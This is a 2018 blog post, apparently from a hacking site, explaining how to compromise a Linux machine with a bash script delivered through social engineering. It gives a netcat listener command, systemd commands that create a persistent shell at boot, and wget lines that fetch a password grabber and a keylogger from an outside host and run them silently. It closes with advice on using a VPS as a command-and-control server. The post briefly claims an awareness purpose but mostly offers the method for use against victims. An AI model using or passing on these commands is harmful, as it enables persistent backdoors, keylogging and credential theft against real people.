HomePostsThe art of bash scripting: Hack the linux
December 6, 2018
The art of bash scripting: Hack the linux
Those days many skids does not know how powerful bash scripting is. The simple language gives you limitless possibilities of task automatization, which consequently brings you many ways of hacking. With combination of social engineering and bash scripting, some big damage could be done. This article will be focused on hacking the linux; Kali Linux. With this article I want to show you how easy the linux could be hacked and to aware you how important is to inspect each script you download, before the use. So in the bellow I will show you clash of Kali vs. Kali. We will obtain shell connection, creating service which will run automatically after each boot or reboot, so we can have persistent shell connection for ever. We will install keylogger and password grabber.
Here is example of how easy tcp connection could be establish between two linux systems.
Attackers command: nc -vv -l -p 8080
– setting the simple listener on port 8080 (you can use any port you want) with the netcat;TCP/IP Swiss army knife
systemctl daemon-reload #reload daemon
service system start #start the service and get the shell
systemctl enable system.service #enable service to start at boot up
wget http://192.168.1.104/la64li -P /bin &>/dev/null #download password grabber 64 bit. Run it after get the shell.
wget http://192.168.1.104/la32li -P /bin &>/dev/null #download password grabber 32 bit. Run it after get the shell.
wget http://192.168.1.104/tester -P /bin &>/dev/null #download the keylogger and locate folder.
nohup bash /bin/tester &>/dev/null #run the keylogger in background for ever
So, when you prepare the script from paragraph 6, with social engineering and some luck you can own the victim for ever. You will have shell for ever, you will install keylogger which will run for ever and sending key strokes on email, you will grab all passwords.
Before the victim run the script you need to set listener: nc -vv -l -p 8080
As soon as victim run the script, the charm will start.
8. Attack over the external network
Of course, attack is also possible over the external network. In this case I will focus on C2 server (command&control server). I prefer C2 instead of attacking directly from my computer with port forwarding or nrgork. Just create VPS with e.g. ubuntu and connect on it with ssh from anywhere. Set the listener on VPS, Also put all files for downloads on this server and have fun.
I show you how easy script for the attack could be prepared and how easy linux system could be hacked and owned for ever. I hope you liked the approach and that I give you some new knowledge and ideas.